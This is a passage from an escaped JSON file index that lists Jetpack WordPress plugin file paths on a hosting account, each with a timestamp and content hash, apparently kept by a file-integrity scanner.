\/automattic\\/jetpack-sync\\/src\\/Settings.php\":{\"d\":1567815231,\"h\":\"36be8547498fa45c508fa8987e645c95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Replicastore.php\":{\"d\":1567815231,\"h\":\"9f3619d996ec7ff581d378fcae258169\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Sender.php\":{\"d\":1567815231,\"h\":\"a4110da34e38a518aab44f2669d9fb24\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Utils.php\":{\"d\":1567815231,\"h\":\"793f7b022c7a8052d34399825d74ed48\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Defaults.php\":{\"d\":1567815231,\"h\":\"194674ec46e3cfd34bc1031a5641de1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Json_Deflate_Array_Codec.php\":{\"d\":1567815231,\"h\":\"b6a843af3d005dd0f6025ed7d3e938e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Replicastore_Interface.php\":{\"d\":1567815231,\"h\":\"b38308a68eb8ea7f7f280254a1c116b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Functions.php\":{\"d\":1567815231,\"h\":\"d866827a2ed4494fbe1a739c02bfe662\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Main.php\":{\"d\":1567815231,\"h\":\"9198923c4835c9b16797f8e729d52774\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Users.php\":{\"d\":1567815231,\"h\":\"52fbfa7456a908dfcd343dacec93cad7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-constants\\/src\\/Constants.php\":{\"d\":1567815231,\"h\":\"920e32e428281db741328063ac67d65c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-logo\\/src\\/Logo.php\":{\"d\":1567815231,\"h\":\"00a86570b74d674e58d4f800b9d2a261\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/autoload_packages.php\":{\"d\":1567815231,\"h\":\"5535d9c960b23032291d1dcfff139aa2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/autoload.php\":{\"d\":1567815231,\"h\":\"ed3a6f547d8895e091d711724b61d364\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/business-hours\\/business-hours.php\":{\"d\":1567815230,\"h\":\"422fea2bc717e72579dd216378c31d9d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/repeat-visitor\\/repeat-visitor.php\":{\"d\":1567815230,\"h\":\"1dff334d5c2b126df695f05cd33e6326\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/mailchimp\\/mailchimp.php\":{\"d\":1567815230,\"h\":\"4c1cca1bb25ea3fabc349e87b2269919\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/slideshow\\/slideshow.php\":{\"d\":1567815230,\"h\":\"e120c02d2602e16a65bfbb93b2bc5487\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/markdown\\/test\\/__snapshots__\\/markdown-renderer.js.snap\":{\"d\":1567815230,\"h\":\"0bf5fcd68b64a0f3953b459c38f4d90c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/markdown\\/markdown.php\":{\"d\":1567815230,\"h\":\"247aabfd55901c023f1acb57323f4695\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/recurring-payments\\/recurring-payments.php\":{\"d\":1567815230,\"h\":\"bf45b130238be455e852074278c8554a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/gif\\/gif.php\":{\"d\":1567815230,\"h\":\"9f813cb0cc7e46233f8446d017a2b27c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/wordads\\/wordads.php\":{\"d\":1567815230,\"h\":\"969c3866e905b3f0143177b825a8c58b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/map\\/map.php\":{\"d\":1567815230,\"h\":\"8ba5249eea1f99bf5c9ac9931187284b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/tiled-gallery\\/layout\\/mosaic\\/test\\/__snapshots__\\/ratios.js.snap\":{\"d\":1567815230,\"h\":\"5378ec7e39da0c364bba265b89e741c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/tiled-gallery\\/layout\\/mosaic\\/test\\/__snapshots__\\/index.js.snap\":{\"d\":1567815230,\"h\":\"f5905ae5701f790131cb681e0bfacfb1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/tiled-gallery\\/tiled-gallery.php\":{\"d\":1567815230,\"h\":\"a62f2f3d1734e1f6a722369ddde0e220\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/contact-info\\/contact-info.php\":{\"d\":1567815230,\"h\":\"66315376bc9efe7b7d0e4a1f3e5f4403\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/extensions\\/blocks\\/contact-info\\/class-jetpack-contact-info-block.php\":{\"d\":1567815230,\"h\":\"f0a77471737809cf96b287f626adc703\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/src\\/Tracking.php\":{\"d\":1567815231,\"h\":\"991a18f545999f8b1c58557ddf17d1e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/wp-cli-templates\\/block-editor-scss.mustache\":{\"d\":1567815231,\"h\":\"b914664961fae7f4aef64a3a70189d25\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/wp-cli-templates\\/block-register-php.mustache\":{\"d\":1567815231,\"h\":\"6e42a93706196b46414c1a8c644e81b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/wp-cli-templates\\/block-editor-js.mustache\":{\"d\":1567815231,\"h\":\"fc2525b1f35217282ebb35fb046b022c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/wp-cli-templates\\/block-edit-js.mustache\":{\"d\":1567815231,\"h\":\"99411f164ac5588bfaf35a3512c60e1b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/wp-cli-templates\\/block-index-js.mustache\":{\"d\":1567815231,\"h\":\"0b94543ea0f2114b26e115ccb4b74b04\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/wp-cli-templates\\/readme.md\":{\"d\":1567815231,\"h\":\"e544a9b5a5d98ce3d14eb1473deaee30\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-post-base.php\":{\"d\":1567815230,\"h\":\"451a7a5b5aa49176b31fb62b82dc4929\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-platform-jetpack.php\":{\"d\":1567815230,\"h\":\"aac6e7a034a06b2400bd548877e28414\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-site-base.php\":{\"d\":1567815230,\"h\":\"7f10f5c1e5354b7287010e0105493c3d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-post-jetpack.php\":{\"d\":1567815230,\"h\":\"7fe27b5a9067a907477a29d04dbfd28e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-date.php\":{\"d\":1567815230,\"h\":\"4bcd8d68e4c00f3e323701c92e6d8d2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-metadata.php\":{\"d\":1567815230,\"h\":\"7dbe1262543d51fd69d354baa27e5420\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-site-jetpack-base.php\":{\"d\":1567815230,\"h\":\"8fa002dbaccc37efce9c9203ab9a565f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-links.php\":{\"d\":1567815230,\"h\":\"d7138e03f1c7d2972857f9cd9e1552a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-token.php\":{\"d\":1567815230,\"h\":\"2593d6e7e6901a1902ac32d8d91fd249\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-site-jetpack.php\":{\"d\":1567815230,\"h\":\"868d63662a078786c4bd6ceb0127d063\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sal\\/class.json-api-platform.php\":{\"d\":1567815230,\"h\":\"d1aa69b0638673fbd0c5902dac4da156\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-rtl.css\":{\"d\":1567815231,\"h\":\"e5d647f5ce4452f5655ebf046499b29e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners-rtl.css\":{\"d\":1567815231,\"h\":\"340c5547b8649fce3e834b3e95732f2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget.css\":{\"d\":1567815231,\"h\":\"557642c33ec3754e4623e00e62946ac9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons-rtl.css\":{\"d\":1567815231,\"h\":\"8b904706b68a893d4517d606acbe7f9b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-rtl.min.css\":{\"d\":1567815231,\"h\":\"76b8a2857d4fc059a846df8491aab534\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin.css\":{\"d\":1567815231,\"h\":\"b69d0613c511a137219a879e62666219\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-connect-rtl.min.css\":{\"d\":1567815231,\"h\":\"cf660e9f7c02936a7f151053e9d451d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack.css\":{\"d\":1567815231,\"h\":\"27e1420b757f01f17a6e1bb95de56456\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar-rtl.min.css\":{\"d\":1567815231,\"h\":\"a746de32bc20433285569bacc07bcc01\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-rtl.css\":{\"d\":1567815231,\"h\":\"c7ee6e520b6916dddddab4387071925e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners-rtl.min.css\":{\"d\":1567815231,\"h\":\"05383b4dacebff6ff43b4c2d1c5eb53d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-rtl.min.css\":{\"d\":1567815231,\"h\":\"ee6a0bbd04db8242a78dc98ae45dd398\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget.min.css\":{\"d\":1567815231,\"h\":\"62ca01f79794c2ec045a7974ced8ffd1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget-rtl.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar-rtl.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar-rtl.css\":{\"d\":1567815231,\"h\":\"cd12863afa247682b1c12d9fa1dbed78\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin-rtl.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar.min.css\":{\"d\":1567815231,\"h\":\"a746de32bc20433285569bacc07bcc01\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget-rtl.min.css\":{\"d\":1567815231,\"h\":\"b76165f6ac61bc204976a74381965828\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc.css\":{\"d\":1567815231,\"h\":\"a90ca83b610a4e6c7c9f1889b5a52d82\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-connect.css\":{\"d\":1567815231,\"h\":\"a2a38ac11baeba1b06d2d4de09308fdc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons.min.css\":{\"d\":1567815231,\"h\":\"0ce65da657e773448fe2e9cb9e4a8650\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners.min.css\":{\"d\":1567815231,\"h\":\"be154fce5999c5095bd2b1403e1dd820\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget-rtl.css\":{\"d\":1567815231,\"h\":\"d3755b6ccd93a102699c80daf96b1cab\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-rtl.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons-rtl.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/dashboard-widget.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners.css\":{\"d\":1567815231,\"h\":\"0a2300d7ec51a9c9ad871a9afb61185e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-rtl.css\":{\"d\":1567815231,\"h\":\"be0b734127950ed9a7ca9aa752669c41\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-banners-rtl.css.min.map\":{\"d\":1567815231,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-admin.min.css\":{\"d\":1567815231,\"h\":\"cf3030fe86f6390de0f87ade5ae2c78a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons-rtl.min.css\":{\"d\":1567815231,\"h\":\"0ce65da657e773448fe2e9cb9e4a8650\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-connect.min.css\":{\"d\":1567815231,\"h\":\"cf660e9f7c02936a7f151053e9d451d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc.min.css\":{\"d\":1567815231,\"h\":\"5d2c84cfaad1072f67b30541b6fa38ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-icons.css\":{\"d\":1567815231,\"h\":\"b6f64dbcb4d6fb27d81636a328c1f74f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-connect-rtl.css\":{\"d\":1567815231,\"h\":\"307dac2f28cd091610e916ea02eb06a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/css\\/jetpack-idc-admin-bar.css\":{\"d\":1567815231,\"h\":\"226f6b58d1cbf4d92640c0724833eda7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-post-images.php\":{\"d\":1567815231,\"h\":\"1765823a6ec931cbea207699cf555473\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-api-config.php\":{\"d\":1567815231,\"h\":\"feaa6519e44a91e9397ec2caf163211a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-tracks.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-heartbeat.php\":{\"d\":1567815231,\"h\":\"367898d75a942c8b50190300f1c10403\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-plan.php\":{\"d\":1567815231,\"h\":\"b1c2b021988369875ca2dad116f961c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/readme.txt\":{\"d\":1567815231,\"h\":\"47e6772e9c7572041bf8cba678c7e3f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-network-sites-list-table.php\":{\"d\":1567815231,\"h\":\"9feb656917391b97d255ed5cf0125d24\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/functions.global.php\":{\"d\":1567815230,\"h\":\"52f9a54355bd962346a7a5bd31828f51\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-bbpress-json-api-compat.php\":{\"d\":1567815231,\"h\":\"1b1e7b464bc15a186c5ae20c5d5bbae8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-jitm.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack.php\":{\"d\":1567815230,\"h\":\"349550dd7b00481b29466d1dad6b8142\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-data.php\":{\"d\":1567815231,\"h\":\"a477c47502244a08f3ba1878f51d3472\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.json-api.php\":{\"d\":1567815231,\"h\":\"9ec5a445e1cda679e825ef93245316e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-constants.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-idc.php\":{\"d\":1567815231,\"h\":\"f5275890dd62bce7141331405d5fab85\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/composer.json\":{\"d\":1567815231,\"h\":\"e42b740152e3bcd77e3386d9a75ccecc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/functions.gallery.php\":{\"d\":1567815231,\"h\":\"bbbc3d54a2a95cea22893af39bb33d75\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-debugger.php\":{\"d\":1567815231,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.json-api-endpoints.php\":{\"d\":1567815231,\"h\":\"e5fc9c365a803c9a3d9dc70515ccbf8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/functions.opengraph.php\":{\"d\":1567815231,\"h\":\"89bc3046c5102ac6870ade076f9b894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-client-server.php\":{\"d\":1567815231,\"h\":\"ffb9eabe1fd1c6b1855da7364b6d9cd2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-options.php\":{\"d\":1567815231,\"h\":\"2f04b81207c97178a1dadc110993d33e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-affiliate.php\":{\"d\":1567815230,\"h\":\"b7620493762b6404b33da2ec3a902367\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/.svnignore\":{\"d\":1567815231,\"h\":\"2135bb13fb7a226f2971efadb7421ae5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-network.php\":{\"d\":1567815231,\"h\":\"7d0c78b20cc3bda14ed7e3cb9696c222\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/require-lib.php\":{\"d\":1567815231,\"h\":\"ed7a11d22fa728efc3d96d62a6eab014\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/json-endpoints.php\":{\"d\":1567815231,\"h\":\"5db0a81da4ea6c00d948f1400236960f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/changelog.txt\":{\"d\":1567815231,\"h\":\"7e48de9e6ebd163197c8d4ec3bd1fe59\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/uninstall.php\":{\"d\":1567815230,\"h\":\"a55907e3452ad9432df8e0636f822cb1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-connection-banner.php\":{\"d\":1567815231,\"h\":\"7c2c22e374a6b5173ccf48a3c920ec13\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/wpml-config.xml\":{\"d\":1567815231,\"h\":\"dd13b8bf93fbab0051916aa266ff79ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/CODE-OF-CONDUCT.md\":{\"d\":1567815231,\"h\":\"db6ba0afc337663f8b36ca44ad28f9c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-admin.php\":{\"d\":1567815231,\"h\":\"c417773a270f77496cfda8e3ad134141\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/functions.compat.php\":{\"d\":1567815231,\"h\":\"6e50cad41560b0c51266d26b0232f578\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-xmlrpc-server.php\":{\"d\":1567815231,\"h\":\"bfa7e1fa63f39bc47b85a5becf6db831\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/jetpack.php\":{\"d\":1567815231,\"h\":\"6f2a8bbbbb402d66f3d2a5e3d72aa9bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/locales.php\":{\"d\":1567815231,\"h\":\"f2ae095420784fedf1a83582d0a47c8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-modules-list-table.php\":{\"d\":1567815231,\"h\":\"970f833ee391d1b60d165e9e144ca89b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-client.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/jest.config.js\":{\"d\":1567815231,\"h\":\"81662c82ec9bd719f458b92fc5cbdfa8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.frame-nonce-preview.php\":{\"d\":1567815231,\"h\":\"c2661ebc6fea90919ebcb6a0228df0ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-user-agent.php\":{\"d\":1567815231,\"h\":\"5791f1f7ee80008f2c7a18630786449f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/functions.photon.php\":{\"d\":1567815231,\"h\":\"66cd2f3cbfc4899cbc1ceb24707ccf6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/load-jetpack.php\":{\"d\":1567815231,\"h\":\"19fe32765dcfc02da452c4deac14cc9a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.photon.php\":{\"d\":1567815231,\"h\":\"290a3a715ff0ddea7ccd1fab9efba83a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-autoupdate.php\":{\"d\":1567815231,\"h\":\"ca5a76f2a7d1cd65106c37443d6cd87f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-error.php\":{\"d\":1567815231,\"h\":\"afbd4bd9f83e4e164d3d7532da438e1c\"},\"\\/home2\\/zp